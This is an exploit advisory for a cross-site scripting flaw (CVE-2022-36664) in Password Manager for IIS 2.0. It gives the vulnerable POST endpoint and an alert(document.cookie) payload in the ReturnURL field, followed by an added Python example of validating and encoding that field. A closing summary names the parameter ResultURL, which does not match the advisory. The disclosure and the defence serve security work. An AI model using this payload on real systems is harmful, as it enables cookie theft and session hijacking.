Password Manager For IIS 2.0 Cross Site Scripting
Password Manager for IIS version 2.0 suffers from a cross site scripting vulnerability.
# Exploit Title: XSS
# Exploit Author: VP4TR10T
# Vendor Homepage: http://passwordmanager.adiscon.com/en/manual/
# Software Link: http://passwordmanager.adiscon.com/
# Version: Version 2.0
# Tested on: WINDOWS
# CVE : CVE-2022-36664

Affected URI (when trying to change user password):
POST /isapi/PasswordManager.dll HTTP/1.1

HTTP Payload (Affected Parameter):
ReturnURL=<script>alert(document.cookie)</script>

Cordially,
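An added example, not part of the original advisory and not the vendor's code: one way a form handler could treat the ReturnURL field defensively, accepting only a same-site path and HTML-encoding it before it is written into the response. The function names, the fallback page and the result markup are assumptions made for illustration.

```python
import html
from urllib.parse import urlsplit

DEFAULT_RETURN = "/"   # assumed fallback page when the supplied value is rejected
MAX_LEN = 2048         # assumed upper bound for a return path


def safe_return_url(raw, default=DEFAULT_RETURN):
    """Return raw only if it is a same-site, path-only target; else the default."""
    if not raw or len(raw) > MAX_LEN:
        return default
    # Control characters and backslashes are normalised differently by
    # browsers and servers, so reject them outright instead of cleaning them.
    if any(ord(c) < 0x20 or c == "\\" for c in raw):
        return default
    try:
        parts = urlsplit(raw)
    except ValueError:          # malformed authority, e.g. unbalanced brackets
        return default
    # No scheme and no host: the value must stay on this site.
    if parts.scheme or parts.netloc:
        return default
    # Must be an absolute path, and not a protocol-relative "//host" form.
    if not raw.startswith("/") or raw.startswith("//"):
        return default
    return raw


def render_result_page(form):
    """Build the (hypothetical) result fragment that links back to ReturnURL."""
    target = safe_return_url(form.get("ReturnURL", ""))
    # Validation narrows what is accepted; encoding is what makes the value
    # inert in HTML. A valid path can still carry quotes or angle brackets in
    # its query string, so both steps are applied.
    escaped = html.escape(target, quote=True)
    return f'<p>Password changed. <a href="{escaped}">Continue</a></p>'


if __name__ == "__main__":
    # Constructed sample inputs: the value quoted in the advisory, and a
    # path that passes validation but still needs encoding.
    for value in ("<script>alert(document.cookie)</script>", '/home?"><b>'):
        print(render_result_page({"ReturnURL": value}))
```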
Related news
CVE-2022-36664: Password Manager for IIS * User Manual * Version 1.0
Password Manager for IIS 2.0 has a cross-site scripting (XSS) vulnerability via the /isapi/PasswordManager.dll ResultURL parameter.